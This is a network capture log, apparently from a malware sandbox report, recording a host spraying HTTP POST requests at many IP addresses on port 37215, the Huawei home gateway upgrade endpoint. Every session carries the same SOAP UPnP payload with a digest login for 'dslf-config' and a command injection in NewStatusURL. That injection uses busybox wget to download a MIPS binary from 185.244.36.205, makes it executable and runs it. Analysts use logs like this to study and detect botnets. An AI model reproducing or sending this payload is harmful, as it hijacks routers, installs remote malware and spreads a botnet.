                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              849192.168.2.1559516186.178.80.11537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538162947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              850192.168.2.154895645.53.8.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538163900 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              851192.168.2.1557606157.216.153.137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538203001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              852192.168.2.155968037.73.227.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538220882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              853192.168.2.1556668167.191.61.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538223028 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              854192.168.2.154777241.5.158.15237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538238049 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              855192.168.2.154645231.245.216.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538247108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              856192.168.2.1536612197.38.217.7337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538280964 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              857192.168.2.1544730190.124.103.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538288116 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              858192.168.2.1541194102.145.242.3537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.538316011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
